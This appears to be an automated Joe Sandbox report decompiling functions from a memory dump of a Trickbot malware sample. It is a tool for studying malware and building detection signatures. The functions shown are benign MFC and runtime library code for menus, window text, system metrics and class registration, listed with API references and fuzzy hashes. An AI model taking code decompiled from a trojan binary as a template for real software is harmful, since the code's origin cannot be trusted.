				struct HMENU__* _t13;
				struct HMENU__* _t14;
				struct HMENU__* _t15;
				void* _t17;
				intOrPtr _t29;
				void* _t31;

				 *((intOrPtr*)(__ecx)) = 0x43d230;
				E00405340(E00438A98, _t31);
				_push(__ecx);
				_t29 = __ecx;
				 *((intOrPtr*)(_t31 - 0x10)) = __ecx;
				_t13 =  *(__ecx + 0x24);
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				if(_t13 != 0) {
					DestroyMenu(_t13);
				}
				_t14 =  *(_t29 + 0x2c);
				if(_t14 != 0) {
					DestroyMenu(_t14);
				}
				_t15 =  *(_t29 + 0x34);
				if(_t15 != 0) {
					DestroyMenu(_t15);
				}
				E00417EC8(_t29 + 0x60);
				 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
				_t17 = E0041B8D3(_t29);
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t17;
			}

0x004218de
0x00422c4e
0x00422c53
0x00422c55
0x00422c58
0x00422c5b
0x00422c5e
0x00422c6a
0x00422c6d
0x00422c6d
0x00422c6f
0x00422c74
0x00422c77
0x00422c77
0x00422c79
0x00422c7e
0x00422c81
0x00422c81
0x00422c86
0x00422c8b
0x00422c91
0x00422c9b
0x00422ca3

APIs

__EH_prolog.LIBCMT ref: 00422C4E
DestroyMenu.USER32(?), ref: 00422C6D
DestroyMenu.USER32(?), ref: 00422C77
DestroyMenu.USER32(?), ref: 00422C81

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: DestroyMenu$H_prolog
String ID:
API String ID: 750541241-0
Opcode ID: dbe10390a64de6f94b1a0dac0a2b1591c5418cee984a07300d04e9c63eb17faa
Instruction ID: b30a52868837e11894a5a009bd114a011af5a20adf3bf9e605b04cbe3bb23ea7
Opcode Fuzzy Hash: dbe10390a64de6f94b1a0dac0a2b1591c5418cee984a07300d04e9c63eb17faa
Instruction Fuzzy Hash: 00F04F71B00615ABC724AF6BEA45B9FB3ECAF44710B00465FE052D7690CBF8ED008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042F5E7, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0042F5E7(struct tagRECT* _a8) {
				signed int _t11;
				int _t13;
				intOrPtr _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t23;

				if( *0x44b35c != 0) {
					return E004187B4(_t18);
				}
				_t20 = E0041B66F(_t18);
				if((_t20 & 0x00040600) == 0) {
					_push( ~(GetSystemMetrics(6)));
					_push(5);
				} else {
					_push( ~(GetSystemMetrics(0x21)));
					_push(0x20);
				}
				_t11 = GetSystemMetrics();
				_t23 = _a8;
				_t13 = InflateRect(_t23,  ~_t11, ??);
				if((_t20 & 0x00c00000) != 0) {
					_t14 =  *0x44b72c; // 0x0
					_t23->top = _t23->top + _t14;
					return _t14;
				}
				return _t13;
			}

0x0042f5ef
0x00000000
0x0042f5f1
0x0042f5fe
0x0042f606
0x0042f625
0x0042f626
0x0042f608
0x0042f614
0x0042f615
0x0042f615
0x0042f628
0x0042f62a
0x0042f632
0x0042f63f
0x0042f641
0x0042f646
0x00000000
0x0042f646
0x0042f64a

APIs

GetSystemMetrics.USER32(00000021), ref: 0042F610
GetSystemMetrics.USER32(00000005), ref: 0042F628
InflateRect.USER32(?,00000000), ref: 0042F632

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsSystem$InflateRect
String ID:
API String ID: 437325472-0
Opcode ID: e3788d4aaa6281c11638be29368c1018a154e50f5c2ca3ff72ca958bcbb1117a
Instruction ID: b116379fca4d468a88f65684b8e28fcd9d5967eb9baeaf6a91e0f9293bd629ae
Opcode Fuzzy Hash: e3788d4aaa6281c11638be29368c1018a154e50f5c2ca3ff72ca958bcbb1117a
Instruction Fuzzy Hash: 5DF08932781634AFE610AB65BC01B7B3268EB41B14F95043BB91597190C6685C568BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EF0, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401EF0(void* __fp0, intOrPtr _a4) {
				int _v4;
				int _v20;
				int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t14;
				intOrPtr _t16;
				void* _t17;

				_t16 = _a4;
				_t17 = _t14;
				_v4 = GetDeviceCaps( *(_t16 + 8), 4);
				_t10 = GetDeviceCaps( *(_t16 + 8), 6);
				asm("fild dword [esp+0x14]");
				_v20 = _t10;
				_t11 = E00405028();
				asm("fild dword [esp+0xc]");
				 *((intOrPtr*)(_t17 + 0x90)) = _t11;
				_t12 = E00405028();
				 *((intOrPtr*)(_t17 + 0x94)) = _t12;
				return _t12;
			}

0x00401efa
0x00401f00
0x00401f0e
0x00401f12
0x00401f14
0x00401f18
0x00401f22
0x00401f27
0x00401f2b
0x00401f37
0x00401f3c
0x00401f46

APIs

GetDeviceCaps.GDI32(?,00000004), ref: 00401F06
GetDeviceCaps.GDI32(?,00000006), ref: 00401F12
__ftol.LIBCMT ref: 00401F22
__ftol.LIBCMT ref: 00401F37

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CapsDevice__ftol
String ID:
API String ID: 3477951718-0
Opcode ID: 0abd36899093160f3ef8f532299ba60b92992d327fb28ff8f70107ff79fc846a
Instruction ID: e214ea2f0b6aacb36c559ac4607d55e41231ba882c9bc41611a5e6f4ded21c6f
Opcode Fuzzy Hash: 0abd36899093160f3ef8f532299ba60b92992d327fb28ff8f70107ff79fc846a
Instruction Fuzzy Hash: 7EF0DAB6908701AFD714DF66EC46A4BF7E8FB89721F01C92EB259A3250D6709808CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004226A8, Relevance: 6.0, APIs: 4, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004226A8(struct HWND__* _a4, CHAR* _a8) {
				char _v260;
				int _t14;
				int _t15;

				_t15 = lstrlenA(_a8);
				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
					L3:
					return SetWindowTextA(_a4, _a8);
				}
				_t14 = lstrcmpA( &_v260, _a8);
				if(_t14 != 0) {
					goto L3;
				}
				return _t14;
			}

0x004226bb
0x004226c4
0x004226ef
0x00000000
0x004226f5
0x004226e5
0x004226ed
0x00000000
0x00000000
0x004226fd

APIs

lstrlenA.KERNEL32(?), ref: 004226B5
GetWindowTextA.USER32(?,?,00000100), ref: 004226D1
lstrcmpA.KERNEL32(?,?), ref: 004226E5
SetWindowTextA.USER32(?,?), ref: 004226F5

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 2be2604f18c3bb89a7eee01f726cce94a27887f8aba2e57b052deb1978e88c82
Instruction ID: aa6bc9a1a3859841b5cb43550d447bac9ac5ad960da4032b922be0b95f0eeaa9
Opcode Fuzzy Hash: 2be2604f18c3bb89a7eee01f726cce94a27887f8aba2e57b052deb1978e88c82
Instruction Fuzzy Hash: 2EF01232500119BBDF226F24ED48ADE7B6DFB18351F009061F856D1164D7F5CE94DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042A6AF, Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042A6AF(void* __ecx, void* __eflags) {
				signed int _t9;
				int _t10;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t13 = __ecx;
				E0042A6F8(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E0041884D(_t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t9 =  *(_t13 + 0x84);
				_t14 = _t13 + 0x84;
				if(_t9 != 0) {
					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t10;
				}
				return _t9;
			}

0x0042a6b1
0x0042a6b5
0x0042a6ba
0x0042a6ce
0x0042a6d0
0x0042a6d6
0x0042a6dc
0x0042a6e4
0x0042a6ec
0x0042a6f2
0x00000000
0x0042a6f2
0x0042a6f7

APIs

Part of subcall function 0042A6F8: GetStockObject.GDI32(00000000), ref: 0042A70E
Part of subcall function 0042A6F8: InflateRect.USER32(?,000000FF,000000FF), ref: 0042A7B2

ReleaseCapture.USER32 ref: 0042A6BA
GetDesktopWindow.USER32 ref: 0042A6C0
LockWindowUpdate.USER32(00000000), ref: 0042A6D0
ReleaseDC.USER32(?,?), ref: 0042A6EC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: f8d062d621c3b2e58aabe9b62a6a74432e7db13986ac40fbadfd3b4f6af3446e
Instruction ID: 313dba54ea59d13e929c7d0086f04736438edc0c4968868ba248bd339783b84f
Opcode Fuzzy Hash: f8d062d621c3b2e58aabe9b62a6a74432e7db13986ac40fbadfd3b4f6af3446e
Instruction Fuzzy Hash: FCE01A32600211AFD7112F65EC0DB867AA4EF40321F194439BA46C62A2DFF59CE18B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040664C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040664C(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x44d0c0,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0040A6E8(1,  &_v280, 0x100,  &_v1304,  *0x44d0c0,  *0x44d2e4, 0);
						E0040973A( *0x44d2e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x44d0c0, 0);
						E0040973A( *0x44d2e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x44d0c0, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x44d0e0) =  *(_t55 + 0x44d0e0) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x44d1e1) =  *(_t55 + 0x44d1e1) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x44d0e0) = _t77;
								goto L16;
							}
							 *(_t55 + 0x44d1e1) =  *(_t55 + 0x44d1e1) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x44d0e0) =  *(_t43 + 0x44d0e0) & 0x00000000;
						} else {
							 *(_t43 + 0x44d1e1) =  *(_t43 + 0x44d1e1) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x44d1e1) =  *(_t43 + 0x44d1e1) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x44d0e0) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00406669
0x0040666f
0x00406676
0x00406676
0x0040667d
0x0040667e
0x00406682
0x00406685
0x0040668e
0x004066c7
0x004066e6
0x0040670a
0x00406732
0x0040673a
0x0040673c
0x00406742
0x00406742
0x00406748
0x00406763
0x00406775
0x00000000
0x00406775
0x00406765
0x0040676c
0x00406758
0x00406758
0x00000000
0x00406758
0x0040674a
0x00406751
0x00000000
0x0040677c
0x0040677c
0x0040677e
0x0040677f
0x00000000
0x00406742
0x00406692
0x00406695
0x00406695
0x00406698
0x0040669d
0x004066a1
0x004066a8
0x004066b0
0x004066ba
0x004066ba
0x004066ba
0x004066bd
0x004066be
0x004066c1
0x00000000
0x004066c6
0x00406785
0x0040678c
0x0040678f
0x004067ad
0x004067c2
0x004067b4
0x004067b4
0x004067bd
0x00000000
0x004067bd
0x00406796
0x00406796
0x0040679f
0x004067a2
0x004067a2
0x004067a2
0x004067c9
0x004067ca
0x004067d0

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00406660

Strings

, xrefs: 004066A9
, xrefs: 00406685

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 234537e40e8c7f6d650b8213b560fcc1438766d722cb852057b4b7f24adbd163
Instruction ID: cce97f6c58ef28f5b0d2c612c65484979d77b96c8f0766b4ea0f5c7029295a4d
Opcode Fuzzy Hash: 234537e40e8c7f6d650b8213b560fcc1438766d722cb852057b4b7f24adbd163
Instruction Fuzzy Hash: AE41AC315002581EFB16C724CD49BFB3FA9AB02708F1504FAD587E71D3C2794A69CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00402610, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402610(void* __ecx) {
				void* __ebp;
				void* _t57;
				void* _t58;
				void* _t73;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t104;
				intOrPtr _t109;
				intOrPtr _t112;
				intOrPtr* _t114;
				void* _t116;
				intOrPtr _t120;
				void* _t121;
				void* _t122;

				_push(0xffffffff);
				_push(E00437468);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t120;
				_t121 = _t120 - 0x4c;
				_push(_t116);
				_t112 =  *((intOrPtr*)(__ecx + 0x3c));
				_t3 = _t112 + 0x20; // 0x20
				E00417C3D(_t121 + 0x10, _t3);
				 *((intOrPtr*)(_t121 + 0x68)) = 0;
				E00417C3D(_t121 + 0x18, _t112 + 0x1c);
				 *((char*)(_t121 + 0x64)) = 1;
				if( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) - 8)) > 0x4b) {
					L2:
					E00417FB5(_t121 + 0x10, _t116, _t121 + 0x18);
				} else {
					_t74 = E0040504F( *((intOrPtr*)(_t121 + 0x18)), "Untitled");
					_t121 = _t121 + 8;
					_t125 = _t74;
					if(_t74 == 0) {
						goto L2;
					}
				}
				_t84 =  *0x447478; // 0x44748c
				 *((intOrPtr*)(_t121 + 0x14)) = _t84;
				_t109 =  *((intOrPtr*)(_t121 + 0x70));
				 *((char*)(_t121 + 0x64)) = 2;
				E004155CC(_t121 + 0x14, "%d",  *((intOrPtr*)(_t109 + 0x14)));
				_t122 = _t121 + 0xc;
				_t57 = E004180D0(_t122 + 0x10);
				 *((char*)(_t122 + 0x70)) = 3;
				_t58 = E0041806A(_t122 + 0x14, _t125);
				 *((char*)(_t122 + 0x68)) = 4;
				E00417FB5(_t122 + 0x14, _t116, _t58);
				 *((char*)(_t122 + 0x64)) = 3;
				E00417EC8(_t122 + 0x70);
				 *((char*)(_t122 + 0x64)) = 2;
				E00417EC8(_t122 + 0x1c);
				_t114 =  *((intOrPtr*)(_t122 + 0x6c));
				E004213CD(_t114, 0);
				_t104 =  *((intOrPtr*)(_t122 + 0x10));
				 *((intOrPtr*)( *_t114 + 0x5c))( *((intOrPtr*)(_t109 + 0x24)),  *((intOrPtr*)(_t109 + 0x30)) + 0x64, _t104,  *((intOrPtr*)(_t104 - 8)), _t122 + 0x70, _t57, _t122 + 0x14, _t122 + 0x1c, _t122 + 0x10, "    ");
				GetTextMetricsA( *(_t114 + 8), _t122 + 0x24);
				_t40 =  *(_t122 + 0x24) + 0x5a; // 0x4025d9
				E0042134C(_t114, _t122 + 0x1c, 0,  *((intOrPtr*)(_t109 + 0x30)) + _t40);
				E00421398(_t114,  *((intOrPtr*)(_t109 + 0x2c)),  *((intOrPtr*)(_t109 + 0x30)) + _t40);
				 *((char*)(_t122 + 0x64)) = 1;
				E00417EC8(_t122 + 0x14);
				 *((char*)(_t122 + 0x64)) = 0;
				E00417EC8(_t122 + 0x18);
				 *((intOrPtr*)(_t122 + 0x64)) = 0xffffffff;
				_t73 = E00417EC8(_t122 + 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t122 + 0x5c));
				return _t73;
			}

0x00402610
0x00402612
0x0040261d
0x0040261e
0x00402625
0x00402629
0x0040262b
0x00402633
0x00402637
0x00402644
0x0040264c
0x00402655
0x0040265e
0x00402676
0x0040267f
0x00402660
0x0040266a
0x0040266f
0x00402672
0x00402674
0x00000000
0x00000000
0x00402674
0x00402684
0x0040268a
0x0040268e
0x00402696
0x004026a5
0x004026aa
0x004026bc
0x004026ce
0x004026d2
0x004026dc
0x004026e1
0x004026ea
0x004026ee
0x004026f7
0x004026fc
0x00402701
0x00402709
0x0040270e
0x00402726
0x00402732
0x00402743
0x0040274d
0x00402759
0x00402762
0x00402767
0x00402770
0x00402775
0x0040277a
0x00402786
0x00402793
0x0040279d

APIs

Part of subcall function 00417C3D: InterlockedIncrement.KERNEL32(?), ref: 00417C52

GetTextMetricsA.GDI32(0000004B,?), ref: 00402732

Strings

, xrefs: 004026B5
Untitled, xrefs: 00402664

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: IncrementInterlockedMetricsText
String ID: $Untitled
API String ID: 4071161107-2281449210
Opcode ID: 254ef68af47bc20d8db6d50f92720e6cd91167b45bdce03409c3e04895833b4d
Instruction ID: fa5c8c615eaa47b1283962e76aa9b7a5492b5ef7f108aa91d830c6c1765fc583
Opcode Fuzzy Hash: 254ef68af47bc20d8db6d50f92720e6cd91167b45bdce03409c3e04895833b4d
Instruction Fuzzy Hash: F8417DB51087469FD204EF24D981AAFB7E8BB98708F00094DF49153391DB78E949CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00427EA1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00427EA1(void* __ecx, char _a4, intOrPtr _a8, void* _a12, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				struct tagRECT _v36;
				signed int _t50;
				intOrPtr _t57;
				void* _t72;
				signed int _t73;
				signed int _t77;
				void* _t81;
				intOrPtr _t87;
				intOrPtr _t92;
				void* _t94;
				intOrPtr* _t95;
				void* _t96;
				void* _t97;
				void* _t105;

				_t96 = __ecx;
				_t50 = 0;
				_v16 = 0;
				_v12 = 0;
				_t77 =  *(__ecx + 0x64) & 0x0000a000;
				_v20 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ecx + 0x84)) <= 0) {
					L21:
					_t97 = _t96 + 0x7c;
					_t94 = _v16 + 1;
					E00416B74(_t97, _t94, _t50, 1);
					_push(1);
					_t81 = _t97;
					_t42 =  &_a4; // 0x42740d
					_push( *_t42);
					_push(_t94);
					L22:
					E00416B74(_t81);
					return _t94;
				} else {
					goto L1;
				}
				do {
					L1:
					_t95 = E00427E85(_t96, _v8);
					if(_t95 == 0 ||  *((intOrPtr*)( *_t95 + 0xc8))() == 0) {
						_t27 =  &_v12; // 0x42740d
						_v12 = 0;
						_v20 = _v20 +  *_t27 -  *0x44b30c;
						_t57 = _a28;
						if(_t77 == 0) {
							_t57 = _a24;
						}
						if(_t57 < _v20) {
							if(_v8 == 0) {
								E00416B74(_t96 + 0x7c, _v16 + 1, 0, 1);
							}
							_push(1);
							_t47 =  &_a4; // 0x42740d
							_push( *_t47);
							_t81 = _t96 + 0x7c;
							_t94 = _v16 + 1;
							_push(_t94);
							goto L22;
						} else {
							goto L18;
						}
					} else {
						GetWindowRect( *(_t95 + 0x1c),  &_v36);
						E0042147E(_t96,  &_v36);
						_t87 = _v36.right;
						_t92 = _v36.bottom;
						if(_t77 == 0) {
							_t72 = _t87 - _v36.left - 1;
						} else {
							_t72 = _t92 - _v36.top;
						}
						if(_v12 <= _t72) {
							if(_t77 == 0) {
								_v12 = _t87 - _v36.left - 1;
							} else {
								_v12 = _t92 - _v36.top;
							}
						}
						if(_t77 == 0) {
							_t73 = 0;
						} else {
							_t73 = 0;
							_t105 = _a8 - _v36.left;
						}
						if((_t73 & 0xffffff00 | _t105 > 0x00000000) != 0) {
							L18:
							_v16 = _v8;
						}
					}
					_v8 = _v8 + 1;
				} while (_v8 <  *((intOrPtr*)(_t96 + 0x84)));
				_t50 = 0;
				goto L21;
			}

0x00427ea9
0x00427eab
0x00427eae
0x00427eb4
0x00427eb7
0x00427ec3
0x00427ec6
0x00427ec9
0x00427f8d
0x00427f90
0x00427f96
0x00427f9c
0x00427fa1
0x00427fa3
0x00427fa5
0x00427fa5
0x00427fa8
0x00427fa9
0x00427fa9
0x00427fb4
0x00000000
0x00000000
0x00000000
0x00427ecf
0x00427ecf
0x00427ed9
0x00427edd
0x00427f53
0x00427f5e
0x00427f61
0x00427f64
0x00427f69
0x00427f6b
0x00427f6b
0x00427f71
0x00427fba
0x00427fc7
0x00427fc7
0x00427fcf
0x00427fd1
0x00427fd1
0x00427fd4
0x00427fd7
0x00427fda
0x00000000
0x00000000
0x00000000
0x00000000
0x00427eed
0x00427ef4
0x00427f00
0x00427f05
0x00427f08
0x00427f0d
0x00427f1b
0x00427f0f
0x00427f11
0x00427f11
0x00427f1f
0x00427f23
0x00427f31
0x00427f25
0x00427f28
0x00427f28
0x00427f23
0x00427f36
0x00427f45
0x00427f38
0x00427f3b
0x00427f3d
0x00427f3d
0x00427f4f
0x00427f73
0x00427f76
0x00427f76
0x00427f4f
0x00427f79
0x00427f7f
0x00427f8b
0x00000000

APIs

GetWindowRect.USER32(?,?), ref: 00427EF4

Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A23B), ref: 00421492
Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A243), ref: 0042149B

Strings

tB, xrefs: 00427FA5, 00427FD1
tB, xrefs: 00427F53

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ClientScreen$RectWindow
String ID: tB$tB
API String ID: 3716460499-3123891508
Opcode ID: e83846ccdf2ccebab0f6702397245aaac5644ebd5c648e059ecc240c08b72810
Instruction ID: 4658d22d4b11067f9b37a5e1a19cb904597ddf9d6b50cee2d977d970705649a9
Opcode Fuzzy Hash: e83846ccdf2ccebab0f6702397245aaac5644ebd5c648e059ecc240c08b72810
Instruction Fuzzy Hash: 02416E31B0822AEFCF14DFA4D9809AEB7B5FF48304F51816AE515E7240DB78EA41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00419462, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00419462(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t27;
				intOrPtr _t40;
				struct HINSTANCE__* _t46;
				CHAR* _t50;

				E0043316A(1);
				E00405861(0, 0);
				_push(0);
				_t50 = E00432335() + 0x58;
				_t27 = E00432562();
				_t40 = _a8;
				_t46 =  *(_t27 + 8);
				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
				} else {
					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
				}
				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_t44 = _a12;
					_push( &_v44);
					_v44.hInstance = _t46;
					_v44.hCursor = _t40;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t50;
					if(E004193D1() == 0) {
						E00421855(_t44);
					}
				}
				return _t50;
			}

0x00419464
0x0041946d
0x00419478
0x00419482
0x00419485
0x0041948a
0x0041948d
0x00419492
0x004194c4
0x0041949e
0x004194a8
0x004194ae
0x004194db
0x004194e3
0x004194eb
0x004194f0
0x004194f3
0x004194f6
0x004194f9
0x004194fc
0x00419502
0x00419503
0x00419506
0x00419509
0x0041950c
0x00419516
0x00419518
0x00419518
0x00419516
0x00419523

APIs

Part of subcall function 0043316A: LeaveCriticalSection.KERNEL32(?,00432E1B,00000010,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011,0041E91C), ref: 00433182

Part of subcall function 00405861: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0040588F

wsprintfA.USER32 ref: 004194A8
wsprintfA.USER32 ref: 004194C4
